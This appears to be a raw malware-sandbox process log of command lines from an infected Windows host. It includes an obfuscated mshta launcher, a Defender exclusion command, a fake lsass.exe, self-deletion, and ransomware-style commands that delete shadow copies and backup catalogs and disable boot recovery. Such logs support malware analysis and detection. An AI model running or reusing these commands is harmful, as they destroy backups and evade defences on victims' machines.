"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Users\Admin\AppData\Roaming\2139512.exe
"C:\Users\Admin\AppData\Roaming\2139512.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 908
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2880 -s 232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 2364 -ip 2364
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 4400 -ip 4400
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4044 -ip 4044
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 4472 -ip 4472
C:\Users\Admin\AppData\Roaming\6859940.exe
"C:\Users\Admin\AppData\Roaming\6859940.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 836 -ip 836
C:\Users\Admin\Documents\X4OSbzA6GYp_UUtBCNSsIkng.exe
"C:\Users\Admin\Documents\X4OSbzA6GYp_UUtBCNSsIkng.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6368 -ip 6368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 4840 -ip 4840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 836 -s 292
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 868 -p 5716 -ip 5716
C:\Users\Admin\AppData\Roaming\7592950.exe
"C:\Users\Admin\AppData\Roaming\7592950.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:8
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Roaming\7637897.exe
"C:\Users\Admin\AppData\Roaming\7637897.exe"
C:\Users\Admin\AppData\Local\Temp\cb8f7621-a82f-47be-9991-72c4ec2cca2b\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\cb8f7621-a82f-47be-9991-72c4ec2cca2b\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\cb8f7621-a82f-47be-9991-72c4ec2cca2b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3728 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cb8f7621-a82f-47be-9991-72c4ec2cca2b\test.bat"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 3784 -ip 3784
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7AA90B9143C4A564E28F6D244F67214B C
C:\Users\Admin\AppData\Local\Temp\438F.exe
C:\Users\Admin\AppData\Local\Temp\438F.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5a4fabfc-b99e-7f4a-9af7-445d488ba628}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\9B77.exe" -Force
C:\Users\Admin\AppData\Local\Temp\535F.exe
C:\Users\Admin\AppData\Local\Temp\535F.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\9B77.exe
C:\Users\Admin\AppData\Local\Temp\9B77.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Users\Admin\AppData\Local\Temp\5C97.exe
C:\Users\Admin\AppData\Local\Temp\5C97.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 8712 -ip 8712
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5804 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 4248 -ip 4248
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8712 -s 28
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 288
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180" "8399"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Users\Admin\AppData\Local\Temp\7D6F.exe
C:\Users\Admin\AppData\Local\Temp\7D6F.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 8988 -ip 8988
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8988 -s 876
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 852 -p 4932 -ip 4932
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4932 -s 2344
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4052 -ip 4052
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 2436
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lhnbi1b1.naw\GcleanerEU.exe /eufive & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1996 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\lhnbi1b1.naw\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\lhnbi1b1.naw\GcleanerEU.exe /eufive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\30p5ig1s.rd1\installer.exe /qn CAMPAIGN="654" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yvl3uk3o.5ez\ufgaa.exe & exit
C:\Users\Admin\AppData\Local\Temp\30p5ig1s.rd1\installer.exe
C:\Users\Admin\AppData\Local\Temp\30p5ig1s.rd1\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\taskkill.exe
taskkill /im MSBuild.exe /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cei014dc.yar\anyname.exe & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3244 -ip 3244
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 296
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B7D7E475A2104AD7A0CC27C9E0624E51 C
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgpmxbwc.c50\gcleaner.exe /mixfive & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5844 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\cei014dc.yar\anyname.exe
C:\Users\Admin\AppData\Local\Temp\cei014dc.yar\anyname.exe
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\pgpmxbwc.c50\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\pgpmxbwc.c50\gcleaner.exe /mixfive
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 0
C:\Users\Admin\AppData\Local\Temp\cei014dc.yar\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\cei014dc.yar\anyname.exe" -q
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\30p5ig1s.rd1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\30p5ig1s.rd1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4696 -ip 4696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 292
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7304 -ip 7304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 452
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y0ooklu2.ky3\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\notepad.exe
notepad.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
